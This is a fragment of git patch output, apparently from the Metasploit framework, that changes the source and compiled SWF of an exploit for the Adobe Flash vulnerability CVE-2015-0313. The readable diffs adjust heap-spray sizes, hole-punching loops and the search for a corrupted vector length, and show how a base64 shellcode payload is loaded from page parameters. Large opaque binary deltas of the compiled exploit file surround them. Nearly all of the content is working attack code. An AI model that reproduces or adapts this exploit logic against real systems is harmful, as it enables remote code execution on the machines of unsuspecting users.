zDB7z{5t%^_COxL{DwR*AnwHVZR#*N=E4Kt2VwY7@=?&=$K(U$7DB{f3{@@ebD@>!p
zn6@O_e|948N_5iH-qEj1?UkK9lECW|;6#D6-1zI0?X^ArZe&>f;MLyaO2g?nf?421
z+Tw<euNW*Ya;gq^L0m778gu_h?Kw25LX6df-}o}@>rvNSH+{mN@LYm{f5KpM?0oqL
zXD{3WEG+*ge|i;pohtycbe2LWDOB4*4p}>ye}AwZ?fN(z8<IwSUE2h(B;}BoTVCJ7
z1L@QJj<;OVx|&hUWv|jTj-vFhoa-Vjz1WHJEkU}q2(^?}bmVVz7?aDeszPqIH8)wj
z%JN#i%q8Yo9oG&wCIB5o^!;Qc><^bK89oGMRjO>3dsAEZ7ba$(gW9U;c8_;}YHUa&
zf9A8~H(`kmo2g^H%|f|2Vz<^P-!@1zsH;@uu%RB^c)ZmYgC2(0Ug-^+kfDvw8O`C2
zZgy+0KWyaS1O5{L%B%Vu1K6bA1~Yn7A51?=!U!o9_j}dvv4QW)v|D-v1N7o?-nf1_
z&|1i;v$3SWwvqG8)eAU{Zvm9z?%R=@f6xu$VRJ(ab$?H5Dz?_JF(pF83@{f0+$e5;
zia&C|dT2oy4uaU@NC{|{z~CQVLUXpQbwQbP4U{@fU}{E#qdsZF{@fyLoc@LaZxD{g
zcOkwQ0Kj<|I<7%2l0ancbG(7@ok0vJn%S?X)NZn>U?Qoo5qvo7@1{cY;CHode+Fck
zVSMAKK{sA|sJh{?6WS$ia%$qE#Bgrm+Ugsb)q-P)lR!c_GZrAzVAgrXZwCdpJgbYP
z`(t0e)@_k@mb=jcZcUJWDM)T;W1GFz-ZJi%e!;a~r1#(3;*LB^YG);GFnDBKdHD}$
zc`fOgU>n~yv4vDbaDCtMW9oakf3*}JB?X673l@7k#Pvad5^o|Yk6-Ue#qy=PhAr-_
zZ{LL!9fB91yK~yLqE&CzeMk}NW8_rf21YBcY1sl}b{NQ+eXyJKOte{YxH2yb*r^hQ
zk9g?KIS3_rd%T?nG>SFyrv$ths>_c#dne0a$B|}d{0%7_W*?w1spY+Fe}&;jO1&Kx
zaRwj{jg{3v(zPL5f|@9&(29~NGj6-rJ&l~|m9ZT0SoQ-ntR{w9r9%@=EkBe@d*pC1
zYs?Dv+z@6i+SYzPlwi?uFG=z7r1L1*9L0nLI4PP=`eVouJ<FW(#E=q4QEr&D-diVZ
nP(3!=-&hk=rU3QB+iKi36Be+Ha#z_TKkyH6ulg4M`lBp?Qn1u;

diff --git a/external/source/exploits/CVE-2015-0313/Exploit.as b/external/source/exploits/CVE-2015-0313/Exploit.as
index 32dac123b9..07269d38f1 100755
--- a/external/source/exploits/CVE-2015-0313/Exploit.as
+++ b/external/source/exploits/CVE-2015-0313/Exploit.as
@@ -23,7 +23,7 @@ import mx.utils.Base64Decoder
 
 public class Exploit extends Sprite
 {
-    private var ov:Vector.<Object> = new Vector.<Object>(120000)
+    private var ov:Vector.<Object> = new Vector.<Object>(80000)
     private var uv:Vector.<uint>
     private var ba:ByteArray = new ByteArray()
     private var worker:Worker
@@ -44,16 +44,6 @@ public class Exploit extends Sprite
     {
         platform = LoaderInfo(this.root.loaderInfo).parameters.pl
         os = LoaderInfo(this.root.loaderInfo).parameters.os
-		Logger.log("od: " + os)
-		var ov_limit:uint
-		if (os == "Windows 8.1" || os == "Windows 8") {
-			ov_limit = 80000
-		} else {
-			ov_limit = 60000
-		}
-		Logger.log("ov: " + ov.length.toString())
-		Logger.log("ov_limit: " + ov_limit.toString())
-		
         var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
         var pattern:RegExp = / /g;
         b64_payload = b64_payload.replace(pattern, "+")
@@ -66,9 +56,10 @@ public class Exploit extends Sprite
         for (var i:uint = 0; i < ov.length; i++) {
             ov[i] = new Vector.<uint>(1014)
             ov[i][0] = 0xdeedbeef
+			ov[i][1] = 0xdeadbeef
         }
 		Logger.log("holes")
-        for (i = 0; i < ov_limit; i += 2) {
+        for (i = 0; i < 70000; i += 2) {
 			delete(ov[i])
 		}
         worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
@@ -89,7 +80,7 @@ public class Exploit extends Sprite
         ov[0] = new Vector.<uint>(1022)
         mc.send("")
         while (mc.messageAvailable);
-        for (var i:uint = 0; i < 20000; i++) {
+        for (var i:uint = 0;; i++) {
         	if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
 				ov[0][i] = 0xffffffff
 				break
@@ -104,12 +95,15 @@ public class Exploit extends Sprite
         var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
 		Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
         if (mod == 1022) mc.receive()
-        else {
+        else {			
 	        for (var i:uint = 0; i < ov.length; i++) {
 	            if (ov[i].length == 0xffffffff) {
 					uv = ov[i]
 				} else {
-					ov[i] = null
+					if (ov[i] != null) {
+						delete(ov[i])
+						ov[i] = null
+					}
 				}
 	        }
 			if (uv == null) {
diff --git a/external/source/exploits/CVE-2015-0313/Exploiter.as b/external/source/exploits/CVE-2015-0313/Exploiter.as
index 9675548493..ebbf9649fa 100644
--- a/external/source/exploits/CVE-2015-0313/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0313/Exploiter.as
@@ -24,7 +24,7 @@ package
         private var payload_address:uint 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
-        private var spray:Vector.<Object> = new Vector.<Object>(89698)
+        private var spray:Vector.<Object> = new Vector.<Object>(15000)
 
         public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
         {
@@ -32,7 +32,7 @@ package
             payload = p
             platform = pl
             op_system = os
-			
+
             ev = new ExploitVector(uv)
             if (!ev.is_ready()) return
             eba = new ExploitByteArray(platform)

From 7fba64ed141e40501d442aab3788da5cb5062e95 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 12:26:53 -0500
Subject: [PATCH 0386/1013] Allow more search space

---
 data/exploits/CVE-2015-0313/msf.swf           | Bin 21011 -> 21012 bytes
 .../source/exploits/CVE-2015-0313/Exploit.as  |   4 ----
 .../exploits/CVE-2015-0313/Exploiter.as       |  12 ++++++------
 .../source/exploits/CVE-2015-0313/Logger.as   |   2 +-
 4 files changed, 7 insertions(+), 11 deletions(-)

diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf
index 5ffb0426ff2295e78babf3e35a53e672052b2172..bcfbde4dbc64971b35ab5a44c403d9561b6a7224 100644
GIT binary patch
delta 20894
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
